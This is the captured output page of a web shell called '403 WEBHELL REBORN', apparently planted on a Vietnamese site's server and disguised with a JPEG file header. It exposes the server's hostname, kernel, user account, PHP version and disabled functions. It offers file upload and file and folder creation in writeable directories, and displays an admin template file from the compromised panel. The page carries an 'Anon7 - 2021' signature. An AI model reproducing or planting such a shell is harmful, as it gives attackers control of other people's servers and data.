ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/adminvn/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html///////adminvn/templates/cp_3_2.html
<!-- BEGIN: cp_3_2 -->
<h1 class="icon-product">Danh mục</h1>
<div class="info-mod radius-top radius-bottom">
    <table width="100%">
        <tr>
            <td valign="top" style="width: 40%; padding-right: 30px;">
                <h2 class="title">Thêm danh mục mới</h2>
                <form action="cat.php?type={ecat1_action}" method="post">
                    <p>Tên</p>
                    <p><input type="text" name="name" style="width: 95%;" value="{ecat1_name}" /></p>
                    <input type="hidden" name="id" value="{ecat1_id}" />
                    <input type="hidden" name="type" value="2" />
                    <br />
                    <p>Mô tả</p>
                    <p><textarea name="desc" style="width: 95%;">{ecat1_desc}</textarea></p>
                    <br />
                    <p>Vị trí
                        <select name="sub">
                            <option value="0">Danh mục chính</option>
                            <optgroup label="Danh mục phụ">
                            <!-- BEGIN: add_cat1 -->
                            <option style="padding-left: 10px;" value="{cat1_id}" {ecat1_check}>{cat1_name}</option>
                            <!-- END: add_cat1 -->
                            </optgroup>
                        </select>
                    </p>
                    <br />
                    <p>Thứ tự <input type="text" name="order" style="width: 50px;" value="{ecat1_order}" /></p>
                    <br />
                    <p><input type="submit" value="{ecat1_bt}" /></p>
                </form>
            </td>
            
            <td valign="top" style="width: 60%; padding-left: 10px;">
                
                <h2 class="title">Danh sách danh mục</h2>
                <form action="cat.php?type=del" method="post">
                <div class="start-mod radius-top radius-bottom">
                <table class="post-t" border="0" cellpadding="0" cellspacing="0" width="100%">
                    <tr class="post-tt">
                        <td class="check"><input type="checkbox" /></td>
                        <td class="c-name">Tên</td>
                        <td class="c-desc">Mô tả</td>
                        <td class="c-post">Sản Phẩm</td>
                    </tr>
                    <!-- BEGIN: list_cat1 -->
                    <tr>
                        <td><input name="id[]" type="checkbox" value="{lcat1_id}" /></td>
                        <td valign="top"><strong><a href="index.php?m=3&sm=2&id={lcat1_id}">{lcat1_name}</a></strong></td>
                        <td valign="top">{lcat1_desc}</td>
                        <td align="center">&nbsp;</td>
                    </tr>
                    <!-- BEGIN: list_cat1_sub -->
                    <tr>
                        <td><input name="id[]" type="checkbox" value="{lscat1_id}" /></td>
                        <td valign="top" style="padding-left: 20px;"><a href="index.php?m=3&sm=2&id={lscat1_id}">{lscat1_name}</a></td>
                        <td valign="top">{lscat1_desc}</td>
                        <td valign="top" align="center">{lscat1_post}</td>
                    </tr>
                    <!-- END: list_cat1_sub -->
                    <!-- END: list_cat1 -->
                    <tr class="post-tt">
                        <td class="check"><input type="checkbox" /></td>
                        <td class="c-name">Tên</td>
                        <td class="c-desc">Mô tả</td>
                        <td class="c-post">Sản Phẩm</td>
                    </tr>
                </table> 
                </div>
                <table>
                    <tr>
                    <td>
                        <select name="action">
                            <option>Lựa chọn</option>
                            <option value="1">Xóa</option>
                        </select>
                        <input type="hidden" name="type" value="2" />
                        <input type="submit" value="Thực hiện" />
                    </td>
                    </tr>
                </table>
                </form>
            </td>
            
        </tr>
    </table>
</div>
<!-- END: cp_3_2 -->

Anon7 - 2021